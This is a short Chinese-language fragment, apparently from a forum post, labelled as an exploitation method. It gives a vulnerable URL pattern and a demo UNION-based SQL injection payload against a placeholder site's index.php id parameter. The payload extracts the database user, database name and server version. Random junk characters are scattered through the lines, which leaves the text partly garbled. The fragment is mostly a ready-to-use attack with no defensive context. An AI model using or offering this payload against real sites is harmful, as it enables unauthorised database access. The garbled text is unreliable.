利用方法:
* E# Q5 r; x! `0 ^/ ?+ Z1 d% ^ http://www.xxx.com/index.php?id=[SQL]5 t+ Q6 q" i5 |. u
Demo:
9 V* m, S% l. r0 Y. ?5 a+ Z5 W http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |